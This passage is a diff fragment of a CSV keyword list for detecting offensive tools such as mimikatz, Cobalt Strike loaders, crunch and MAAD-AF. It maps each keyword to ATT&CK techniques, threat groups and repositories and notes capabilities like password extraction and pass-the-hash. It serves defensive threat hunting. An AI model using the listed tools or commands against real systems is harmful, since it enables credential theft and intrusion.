T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*Cross-Site-Scripting-XSS-Payloads*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*CrossTenantSynchronizationBackdoor.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" @@ -8923,19 +9071,19 @@ "*crunch * -o *.txt*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*crypt0p3g/bof-collection*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" -"*crypto::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::certificates*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::certtohw*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::extract*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::keys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::providers*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::sc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::scauth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::stores*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::system*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*crypto::tpminfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::certificates*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::certtohw*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::extract*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::keys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::providers*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::sc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::scauth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::stores*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::system*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*crypto::tpminfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*crypto_identifier*","offensive_tool_keyword","crypto_identifier","Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. Usefull for a quick check on unknown cipher text and key dictionary","T1573 - T1558 - T1112","TA0001","N/A","N/A","Exploitation tools","https://github.com/Acceis/crypto_identifier","1","1","N/A","N/A","2","116","26","2018-01-04T11:04:56Z","2017-11-30T13:04:49Z" "*cryptvortex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*cs2modrewrite.py*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" @@ -8954,18 +9102,18 @@ "*CSharpNamedPipeLoader*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*csload.net/*/muma.*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*csOnvps*teamserver*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 